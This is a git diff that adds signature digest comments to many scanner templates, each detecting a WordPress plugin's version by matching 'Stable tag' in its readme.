a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..388616397a 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100febd8d6716f43e2ea6b2efa0f761bad1bae36f6369a66266fe161521f091fa48022100b81414a7055c3eb4995a7904cdb1c17d3ccd2d5723303e1aa02aa90d6a9eff91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..c8a03efa84 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eac4762793ee00a31c934f831e078d720ce582c090f2fc84e1d11da904926fc2022100ca3efe22aa225b9f9b409270913e8b637dce2990259188c9585ec9b51b0bc6ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..a36711fc55 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a3b84336c54d4daa03cba1da2fc110780a4b2b33e9703873977aa71ff71a29970220677fafeba9778b89c667f2f6b421758a5a325e1f10362b0c113186aa141ba178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..9f224d1786 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0ecfc0d0eedf024024c155f6ef23860177818d6ce6b796256de6f801fca3523022100a2759d5f3289e6410ba4a68b55c98f22400cf120ad920ab8e9252f86f79feb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..1c55418ec9 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ec3b252dc313c84879431358491debdc4549bea050c14f38631466a66377862022100b4335e859913ce6eedc16b1dd4b8972066608920e058b20a471b211bdf017d84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..37fe866e29 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3d66c21537e5bfdf97f63496521715ccf1ede426d3d34d01dd64e02616193660221009fd41c1be766614b019840f04fd1322077387187345803b3ea5d6266cca72988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..b8398f5380 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe9af84b87b1d096ee7cf4f77fb599700827539dbfc6a98bc8df24388d835c7e022100a32efbe0b25aa2f45a7d1ed476e5530d7f0613b66af580c5db800cf9e111cc80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..eec314b819 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022037d1f9adb42a56408d45877309111be80c9e1ea1a2071cc3712b9420afce0bda0221009c59a6ca958a9998e8974527dd8826852483b3d1820848c1bb6d1c3469b8b78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..18ff4fda58 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe86f9cfdf9413c0173a51df30859d682001b966dda6bbfa0798effcd51daef7022052ce2076eed2e2f6cc1e3fed4206145508c31c587fce37ec707792953eea74bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..7f8c1c9c2d 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf0fd5df95826032a570fb14ee61199698f1fc6e06cafbbf6fb232ba36745b70022025f14da710c483c2962a855b6729a7c136e4ed47ac3a11b50ca6747ef425cdb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..3e88c11b23 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220329411e72cc77ce4bb92d8830c96770302d71f4ba34cc2dbe36bad9395a19d57022100adb1c9223473f18750a62a73d21528cb6641c252f5dcfb0ffa546ce8a41eedcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..fc5926b683 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220427d525182590bb3f8ac745e07d102823face1012a106e1bf04c7f02ce3f40a1022100e6a301fd32b4b96770adc41e49d991196ea642a63b1218a3ac3c3ed39d815b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..d3e5eb4085 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008eeb2eef1480f2c56fd74a6dd2558c2c4dfaebec330423b26a9da56270885a410220074fe5c44cce56d01c1726d545da980c160cb29a2b3081e1f31f1d1a461a2c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..f01d295b31 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201bed7153b1cf96ee8aff072b5559a373e8b5de40a9dce419cec0ebedf6fa8fae0221008173cca62a1a5498b6894cf4e23c4f6165ea5187b5ef11d1209ae44579e050db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..1fd265a7d3 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022013ad14bdabc3a04dfd579b312a7653ed1e7d3fbb18321f9c10b38fd70df5d7ac0221008dfe5aa4008baee41dfd535d4f53e10c40b8ee85f37c96a041fa25f4fb37d9bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..8ab2a61ddb 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ebdb6d34d0003295ae3f15dc897e84396c62333946880e1ec1c542fcc96d03e40220027cf90b185886a8c4a989401bc0ae22c8152c86f23549e9bb3b3306e526d385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..a52ebd7f61 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec9e0d25a32e9bafd4cc7f7524b8d2c5bf2ae1c532fd35e57afc319807ae79ae02207d4f08971a2a6f7814181d50c3c13210cab32a86c4eb5bd7f58866bc6c36b4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..d543e74473 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa52bbdb854a756b3eac5adfcb414798fb44ddf786a4fadb9ce954ee9c14a78c022100cafa945d170a9f7c7b586ad76f5d7df4d3f557d3c4f91e137336a1c118bd06cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..951eca51f5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200baccfc18a9b4208e31b2df56ff600c5e9abd19773db3272d9653a02d6fe3cd3022100cc3445682fecc09f816496c44fb716133986528dfb7e8b4802a1802dc47e24a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..ca2e201af1 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220546b401130f46adf81812c4b98e02e7c8f94e35f1f774aaf9c7fde65bffc66c1022100a3445d167372612efedbd06a6629687134f3d545900ffcc3557728300a2819c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..6321c8eecd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204759f22cf1a14948d9e4641c16cd7a0b5ca5dcb6987a95aa3e20ccb1cf0a4910022100cc6bb60e8926e9491a0c6a468bb1eb9e87b917a3c0ffe6a0b3f94aa5d644b490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..dea53adb7e 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204eae9133d28fc6644e60cdce4bd1353eb71f5888c73cc65c86c41b93f3df7918022100bd6de5d1b47b4fec5f418675c4e21361b0f965a8c1e78bc61283738c8e954cb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..f24b1a97d5 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220032edef101f859991abb1df1556f9b8d1b3ee9e3c0011dd5ef92773d63d42f68022073863b7d8eb3cd016c802311b7314109e9174e5787782b5af3a94db7d5b4a8cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..d5f1761108 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da5c6572c8351f691bf0cc82b247e2ee6e1d162bec4c4f0daeafe23583c718c902203076b9877a6e61345192a9cafe4cb4fe6accddfa505a9fc3568bd2ea3a198550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..180e1c2420 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220744eb91641bb50eb06d7207bc85ac71df0ef538cc85b2cf0b499bb3d6adce8ba0220273859d89081916b2ef77f2eb4b147ec4902e4ebcac526403584afdcb8e95842:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..a4ec782de3 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c49aee778dfe2a9ba45cec3a411869d47a7557ce7d7df659912cf1649dafe282022100af6287fa78501fb4fdee4206a22e7d4f80d641579b40e1e7c6cb52d8137645dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..e692176b9d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220422ed29d6b38c4a02166e0a10159b6c4aa743e8e02cb600514093762ef2aed14022046095558c0f4f9cda91e1529f4e681e67ca650172e3b32bd545a0506d04ea0e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..c54fb22513 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220515dc2b9c11de53d44e4241736b1acbdf40107885bbb71ad7237ef369e6a5a6102207af1bb64526e3adcf78f601ed447a51a159a490c55dacb473d7fe54adbca5ce4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..a35a257577 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b4e9dbaa12abfe6f07ec4ad30a4f0beb4c2c227fb303017e2e4ec13b367c8800220105cd67dad1e2b13a81c6fbff4becbf2d7939d7915ff8db05c05d6df56539fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..4cfd03ccec 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022029f6d3e9c7e33e7c5248d01a657f29b61c77ba87614726291617fd53ba63ba98022008c31eaef457284372f6f172416ebae6bed47fb1f99fa85bf45078941eb1fa10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..79a0d90b4c 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbc3cb66d7292371eaa8538b079bd911983706a47a50d0944c8860f48aef99070220188ecf6c480f36488c8d48ffb10fcb7f2479264efcb924eb570e431d0e94ef14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..37bd5c4cde 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022032187e5fef30712c43c9d478f8bf5beaa9fba4289ff2391218ef8cb142a51af8022100fb2a6499eccd5026e285b57783c89452d8f65fb41acf79117120426848449ec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..e57b6025e1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220605023b715939f04f8947cf09ecfb898c3c6b5f7d5505d3b85bf0068d54f9e2d0221009f03d6df8f0ae96f560fc963128839f5758ef598df7ed0045e70d19ac85f84a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..fd897dec1a 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204ed26b29c6b77fd422e4bbb418149a34d95d4572bf678de1ccc4ee823ad2b902022039f4cac26ff1aef342a18d6db60ef3a422f7a0cd9acca7ce62906353678d4935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..39cbb071b0 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012d4a9f18514839dfd03ecdb200bb95fdbbd37c6b294ac127beffe7e98890495022100a20fdfcac7fd27bccbc21be7795edc74108249ab609d1047948081dd6cc11809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..8d23fd73b1 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7bfe95d6ec527f3760d3c0dccee679c39fb7b86dda53cc5e9ee789efd44c828022100af5b460ebd1d6a1fee0e71ec32e03e780d952510d50d78786417c0005c766c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..58fc2d3450 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e1718a9fe05feec29ee5c22baab9981a104709485e3e1e777a51c30e973073e022021e151d6c6a75136dc2bc59f617e07b7e73acc96f87a0f1e745315f1a5c61364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..d3224d7436 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c7da05a446a9e2af2e741048f3f4d629783b234863eeb90fd2edebedb70c4430221009eddf369e05e53c1d17827dabd4c0aabadaf0db550c17e8b6a2cee9d449b9bde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..9d58abb01b 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022015f643b58fabeeb984c3d9bd1bf96da2466fb25b216f523bd1073f1113250ffc022100bf8f4df37885a905ceb849acbde22f2dede23884b4f47874a8509622fededa0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..1cab735e64 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e05c67b09f5372b1747db1c5c02e812b128d59caab7f44559ff44126f7d25c502203a76fdc1d345b43c4cbbb23062aba71c0753f9a0e82535e1240958f8885ee940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..5f0e0af771 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d85a762584925f3c79b227b864fa9dc4445463abce96d4c58bbd6c4b2b934b1022100d8af6625686b328b1479f74b573d543b905fd1ebafc5f312e64f41e60afa72b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..d1a75317a8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cfd8133b979c7c9a19be1834049c7ffba6cc62eb25edfb368b4ec4bd3c4d9ce1022100f815e3cfff54dddc5baba61cec1c27f50005f43dc41b2789e7d8d9ae7cd4f467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..da27aaa1cf 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040884d9fa8840e1aa2766ac89864a224b11a42dfb68de5405f16de6283a7ad55022047bf60599755967410e577c0d83d594d8224fdb326e442935007cfc94899f71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..c4df860286 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8a1527cd448a16679dd288dcc2f8b9a9e63422556e1c35bfb59421e61ef73600220552aa0cc1409d8d2f191d10e4dcaebf338c6b75ffaa7b2bb26b6765236097334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..781ec0cf99 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d46156ad07af0a090fb6e46d19e8632fd5dc53be2248e7559af9b34c860104480221008ba13baf1ad9d823bb8b7276ff5c88ca5e52a42384e52a957e950985db7c02d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..3eb3fac499 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f2f679fc5b152b1fff9cf660a1485b277c88fc6e41822734a82f3da773a67ba0220425c9c0cd6d477a41f3028c52b24041171883383368cd3c6e8c9e508ba67b23f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..dc62f7a3b8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbcab9946e50c30df650a3d3010e4a6eaeabe60f658ba586793446096da6af2c0220205f9baff276094f3bd4026e1bdb528d8b0224db1441d1debde7ebd30a286b28:922c64590222798bb761d5b6d8e72950 \ No newline at 